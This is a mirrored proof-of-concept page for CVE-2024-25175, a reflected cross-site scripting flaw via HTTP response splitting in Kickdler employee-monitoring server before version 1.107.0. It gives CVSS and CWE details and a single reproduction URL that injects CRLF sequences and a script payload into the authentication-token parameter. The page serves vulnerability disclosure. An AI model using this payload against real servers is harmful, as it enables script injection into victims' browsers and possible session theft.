Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-25175 PoC — Kickdler 安全漏洞

Source
Associated Vulnerability
Title:Kickdler 安全漏洞 (CVE-2024-25175)
Description:Kickdler是Kickdler公司的一款员工监控软件。可探索员工电脑活动水平,提高生产力并找到增长点。 Kickdler v1.107.0之前版本存在安全漏洞,该漏洞源于存在反射型跨站脚本(XSS)漏洞。
Readme
# CVE-2024-25175

## Reflected XSS via HTTP Response Splitting
**Description**: Exploitation of this vulnerability can lead to the execution of JavaScript code in the victim's browser (Cross-Site Scripting) when following a specially crafted link. The vulnerability arises because The web server does not correctly process line breaks (\r\n or CR\LF, in urlencode it is %0d%0a).

**Impact**: Reflected XSS

**CVSSv3.1 vector**: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (**6.1**)

**CWE**: CWE-20: Improper Input Validation

**Affected Component**: GET parameter `kickidler_authentication_token`

**Vendor**: [Kickidler: Employee Monitoring Software](https://www.kickidler.com/) 

## Affected Product
- Kickdler Server before version 1.107.0

## Steps to reproduce:
```
http://[IP_kickdler_server]:8123/?kickidler_authentication_token=test%0d%0a%0d%0a%3Cscript%3Ealert(document.domain)%3C/script%3E
```
![Request in Burp Suite](https://github.com/jet-pentest/CVE-2024-25175/blob/f6de3d723d51413ee67ac80ec1e2c33663378bd8/exploitation1.png)
![Result](https://github.com/jet-pentest/CVE-2024-25175/blob/f6de3d723d51413ee67ac80ec1e2c33663378bd8/exploitation2.png)
## Discoverer
- Alexander Starikov (Jet Infosystems, https://jet.su)
## References
- https://nvd.nist.gov/vuln/detail/CVE-2024-25175
File Snapshot

[4.0K] /data/pocs/e39298a0e3de7de28c579dd448125764ffe53767 ├── [111K] exploitation1.png ├── [ 24K] exploitation2.png └── [1.3K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.